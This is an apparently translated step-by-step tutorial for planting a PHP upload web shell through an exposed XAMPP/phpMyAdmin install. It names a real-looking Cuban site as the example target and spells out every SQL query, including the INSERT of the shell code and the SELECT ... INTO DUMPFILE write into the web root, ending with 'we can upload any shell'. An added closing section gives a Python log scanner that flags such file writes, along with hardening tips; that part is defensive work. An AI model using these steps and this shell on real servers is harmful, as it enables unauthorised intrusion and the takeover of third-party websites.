Step 1: Find the document root path
+ Go to http://www.victim.com/xampp/
Example: http://www.ehtpe.co.cu/xampp/
+ Open phpinfo() to see the document root path: C:/xampp/htdocs
Step 2: Log in to the database:
+) http://www.ehtpe.co.cu/phpmyadmin
Step 3: Create a new database
Example: VHB_Group.
Use the query:
CREATE DATABASE VHB_Group;
Or as shown in the illustration below:
Step 4: Create a new table
+) In the newly created VHB_Group database, create a new table named soleil, using the following query:
CREATE TABLE soleil (contentshell varchar(10000) not null)
Step 5: Insert the shell code
+) Insert the upload shell code into the newly created soleil table, using the following query:
INSERT INTO soleil VALUES ('<?php
if ($HTTP_POST_VARS[\'submit\'])
{
if (!is_uploaded_file($HTTP_POST_FILES[\'file\'][\'tmp_name\']))
{
$error = "You did not upload a file!";
unlink($HTTP_POST_FILES[\'file\'][\'tmp_name\']);
// assign error message, remove uploaded file, redisplay form.
}
else
{
//A file was uploaded
$maxfilesize=300000;
if ($HTTP_POST_FILES[\'file\'][\'size\'] > $maxfilesize)
{
$error = "File is too large.";
unlink($HTTP_POST_FILES[\'file\'][\'tmp_name\']);
// assign error message, remove uploaded file, redisplay form.
}
else
{
//File has passed all validation, copy it to the final destination and remove the temporary file:
copy($HTTP_POST_FILES[\'file\'][\'tmp_name\'],$HTTP_POST_FILES[\'file\'][\'name\']);
unlink($HTTP_POST_FILES[\'file\'][\'tmp_name\']);
print "File has been successfully uploaded!";
exit;
}
}
}
?>
<html>
<head></head>
<body>
<form action="<?=$PHP_SELF?>" method="post" enctype="multipart/form-data">
<br><br>
Choose a file to upload:<br>
<input type="file" name="file"><br>
<input type="submit" name="submit" value="submit">
</form>
</body>
</html>');
Step 6: Export the PHP file
Use the query:
SELECT * INTO DUMPFILE 'path/upload.php' from table_name;
Path: the document root path.
Example:
SELECT * INTO DUMPFILE 'C:/xampp/htdocs/upload.php' from soleil;
Step 7: Run the shell
Run the shell at the URL: http://domain/upload.php
Example: http://www.ehtpe.co.cu/upload.php
Using the upload.php shell, we can upload any shell.
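From the defender's side, the file write in step 6 is the event to detect. The following is an added example, not code from the original post: it scans MySQL general query log lines for SELECT ... INTO DUMPFILE/OUTFILE and rates the target path. The web-root list, extension list, severity labels and sample log lines are assumptions constructed for illustration.

```python
import re

# Matches SELECT ... INTO DUMPFILE/OUTFILE '<path>' and captures the target path.
FILE_WRITE = re.compile(
    r"\bINTO\s+(DUMPFILE|OUTFILE)\s+(['\"])(?P<path>.*?)\2", re.IGNORECASE | re.DOTALL)
# Assumed policy values: adjust to the web roots and script handlers of your servers.
WEB_ROOTS = ("c:/xampp/htdocs", "/var/www", "/opt/lampp/htdocs")
SCRIPT_EXTS = (".php", ".phtml", ".php5", ".phar", ".jsp", ".asp", ".aspx")


def normalize(path):
    """Lower-case, unify separators, drop whitespace padding around '/'."""
    p = path.strip().replace("\\", "/").lower()
    return re.sub(r"[\s/]*/[\s/]*", "/", p)


def classify(statement):
    """Return (severity, path) for a file-writing statement, else None."""
    m = FILE_WRITE.search(statement)
    if not m:
        return None
    path = normalize(m.group("path"))
    in_web_root = any(path.startswith(root + "/") for root in WEB_ROOTS)
    is_script = path.endswith(SCRIPT_EXTS)
    if in_web_root and is_script:
        return ("critical", path)   # executable file dropped where the web server serves it
    if in_web_root or is_script:
        return ("high", path)
    return ("review", path)         # any server-side file export deserves a look


def scan(log_lines):
    """Return [(line_number, severity, path)] for every file-writing query."""
    hits = ((n, classify(line)) for n, line in enumerate(log_lines, 1))
    return [(n, *hit) for n, hit in hits if hit]


# Constructed sample lines, loosely in the shape of a MySQL general query log.
SAMPLE_LOG = [
    "2024-01-01T10:00:01Z 12 Query CREATE DATABASE VHB_Group",
    "2024-01-01T10:00:09Z 12 Query SELECT * INTO DUMPFILE ' C:/xampp/htdocs /upload.php' from soleil",
    "2024-01-01T10:02:00Z 15 Query SELECT id FROM orders INTO OUTFILE '/tmp/orders.csv'",
    "2024-01-01T10:03:00Z 15 Query SELECT name FROM users WHERE note = 'into the file'",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Setting MySQL's secure_file_priv to a directory outside the web root (or to NULL) restricts where the server may write export files, and keeping /xampp/ and /phpmyadmin off the public interface removes the entry points used in steps 1 and 2.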